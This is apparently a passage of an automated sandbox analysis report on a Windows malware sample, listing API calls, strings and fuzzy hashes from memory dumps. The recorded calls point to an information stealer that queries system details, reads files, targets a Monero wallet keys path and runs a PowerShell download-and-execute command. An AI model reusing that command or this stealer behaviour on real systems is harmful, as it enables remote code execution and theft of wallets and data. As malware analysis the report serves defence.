                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess$DefaultLangUser
                          • String ID: *
                          • API String ID: 1494266314-163128923
                          • Opcode ID: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                          • Instruction ID: 8090f60c3b387ddaeaa0c0f383d498de0b3a28169c7f486ec9991c1b3adb438f
                          • Opcode Fuzzy Hash: ca52858c05704047abe13c91626df3c99c597db6d4f2875e06a77bf29464feb7
                          • Instruction Fuzzy Hash: 7DF08231904209EFD3459FE0E90972C7BB8FB04703F148198F619A6290D6B04B41DF96
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00124FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00124FD1
                          • InternetOpenA.WININET(00140DDF,00000000,00000000,00000000,00000000), ref: 00124FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00125011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00125041
                          • InternetCloseHandle.WININET(?), ref: 001250B9
                          • InternetCloseHandle.WININET(?), ref: 001250C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 53ca3b19ee31fd05bdffaaa32edee27e74da9e7432ae533359f5a589560f10ea
                          • Instruction ID: c8f83d3a554990b79d2f8f54a298d04655a8c656d9576ee80cbb8009cbd5b76f
                          • Opcode Fuzzy Hash: 53ca3b19ee31fd05bdffaaa32edee27e74da9e7432ae533359f5a589560f10ea
                          • Instruction Fuzzy Hash: 583107B4A00218ABDB24CF94DC85BDCB7B9EB48704F5081D8F609B7281C7B06A858F99
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F0F278,00000000,?,00140E2C,00000000,?,00000000), ref: 00138130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00138137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00138158
                          • wsprintfA.USER32 ref: 001381AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                          • Instruction ID: 760948895650a3cd77de581ebe2cf80b7a52a43007d210e62e629847e011843e
                          • Opcode Fuzzy Hash: be3c4b87eb589ff50f2c51f150cf2cf0684dc1558ee73d3d82a3609b9082842e
                          • Instruction Fuzzy Hash: 5D211AB1E44318ABDB04DFD4DD49FAEBBB8FB44B10F104609F605BB280D7B869018BA5
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                          • wsprintfA.USER32 ref: 00138459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,00F0F1D0,00000000,000F003F,?,00000400), ref: 001384EC
                          • lstrlen.KERNEL32(?), ref: 00138501
                          • RegQueryValueExA.ADVAPI32(00000000,00F0F290,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00140B34), ref: 00138599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00138608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0013861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                          • Instruction ID: fd70808b32395fc0dee0e5325ef7836e19109563736261d4b2fda8bd59295c19
                          • Opcode Fuzzy Hash: f99c702c614473a6c1741b927dd5ca0295c684f01d373bd75c3e846b2ae4d5fb
                          • Instruction Fuzzy Hash: D821E9B1910218ABDB24DF54DC85FE9B7B8FB48700F00C5D8E649A6140DF71AA85CFE4
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001376A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 001376AB
                          • RegOpenKeyExA.ADVAPI32(80000002,00EFC250,00000000,00020119,00000000), ref: 001376DD
                          • RegQueryValueExA.ADVAPI32(00000000,00F0F0B0,00000000,00000000,?,000000FF), ref: 001376FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00137708
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                          • Instruction ID: 4ed6941b9f1c03d546c7083603ab92bbede42ccfada393cf6c7deb73b8ca8e3d
                          • Opcode Fuzzy Hash: 01adaf3919e1b81a3fcd141288ceb3ca68fa61447f3df1f4706e4c9e69250666
                          • Instruction Fuzzy Hash: BB014FB5A04608BBEB11DBE5DD49F69B7BCEB48701F108054FA05A7291E7B099008F51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0013773B
                          • RegOpenKeyExA.ADVAPI32(80000002,00EFC250,00000000,00020119,001376B9), ref: 0013775B
                          • RegQueryValueExA.ADVAPI32(001376B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0013777A
                          • RegCloseKey.ADVAPI32(001376B9), ref: 00137784
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                          • Instruction ID: 2d9730a7a871e695f1c262115edc03eb17d7838db78167c8e40e6e88b19a62ab
                          • Opcode Fuzzy Hash: 4ac5cbbedc571748fccc4f2a29d90af88aaafc2939a027195814fffe419386f0
                          • Instruction Fuzzy Hash: A801F4B5A40308BBD711DBE4DC4AFAEBBBCEB48705F108555FA05B7291D7B065408F51
                          APIs
                          • memset.MSVCRT ref: 001340D5
                          • RegOpenKeyExA.ADVAPI32(80000001,00F0E350,00000000,00020119,?), ref: 001340F4
                          • RegQueryValueExA.ADVAPI32(?,00F0F398,00000000,00000000,00000000,000000FF), ref: 00134118
                          • RegCloseKey.ADVAPI32(?), ref: 00134122
                          • lstrcat.KERNEL32(?,00000000), ref: 00134147
                          • lstrcat.KERNEL32(?,00F0F3C8), ref: 0013415B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                          • Instruction ID: a42351f87a61d13a71280eb247f90dad9b58a9400c88c8c390f6a12d059aa8fd
                          • Opcode Fuzzy Hash: b8bbf99eab979d9172ff5bad2068fc39c463c9a404eb373e6d806fbbcb1d55f4
                          • Instruction Fuzzy Hash: 3241A7B6D001086BDB15EBA0EC46FFE737DAB99300F008558F61557181EBB59B888FE2
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                          • LocalFree.KERNEL32(0012148F), ref: 00129A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                          • Instruction ID: 5c9717a882a74b80e148968242c563151e1ad5b1b6e97abd04f70adac528f5df
                          • Opcode Fuzzy Hash: c7586ac09c937510c739b5a1d37915c7ca830dbf773f2105ab42149659765ac1
                          • Instruction Fuzzy Hash: E0311AB4A00309EFDB14CF98D985BEE77B9FF48340F108158E912A7290D778AA51CFA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 4c5ffac09d6fd3a4bd475345e00912c61472599afd97f77ef8940a8a77965bbb
                          • Instruction ID: ae456c62bdfcf5af21c8cedeee4142de3fc2451b4c38a171609979dc8e66f395
                          • Opcode Fuzzy Hash: 4c5ffac09d6fd3a4bd475345e00912c61472599afd97f77ef8940a8a77965bbb
                          • Instruction Fuzzy Hash: 4541F6B110079C5EDB258B24DD85FFBBBE89F45708F1444E8E98A96182D3719A44CFA0
                          APIs
                          • lstrcat.KERNEL32(?,00F0F2F0), ref: 001347DB
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00134801
                          • lstrcat.KERNEL32(?,?), ref: 00134820
                          • lstrcat.KERNEL32(?,?), ref: 00134834
                          • lstrcat.KERNEL32(?,00EFAA88), ref: 00134847
                          • lstrcat.KERNEL32(?,?), ref: 0013485B
                          • lstrcat.KERNEL32(?,00F0E2B0), ref: 0013486F
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 00138D90: GetFileAttributesA.KERNEL32(00000000,?,00121B54,?,?,0014564C,?,?,00140E1F), ref: 00138D9F
                            • Part of subcall function 00134570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                            • Part of subcall function 00134570: RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                            • Part of subcall function 00134570: wsprintfA.USER32 ref: 001345A6
                            • Part of subcall function 00134570: FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                          • Instruction ID: ea1e99b02d30840362d1d9fa14daf5cb5d70c43a01c9439c2974faa814a2df8d
                          • Opcode Fuzzy Hash: ddda5e63a6ba4a4f38276adb754c89717bc8fa9a427b2a9a09d68e8af4eaf7d2
                          • Instruction Fuzzy Hash: 003150B290031867CB11FBA0DC85EED777CAB68704F404589B359A6081EFB4E6898F95
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00132D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00132CC4
                          • <, xrefs: 00132D39
                          • ')", xrefs: 00132CB3
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00132D04
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                          • Instruction ID: 1f653efa7ef9ba5802cf83ac7a8bd70726191e15505621ac67fc0fafead2f11a
                          • Opcode Fuzzy Hash: 51c3fe5f06991874ccb5634ab179cd56e66c9fc3634c6acf717f5eea90de708c
                          • Instruction Fuzzy Hash: 6241D371C50208AADB15FFA0C892FDDB774AF24300F904159F156B7191DF746A4ACF92
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00129F41
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
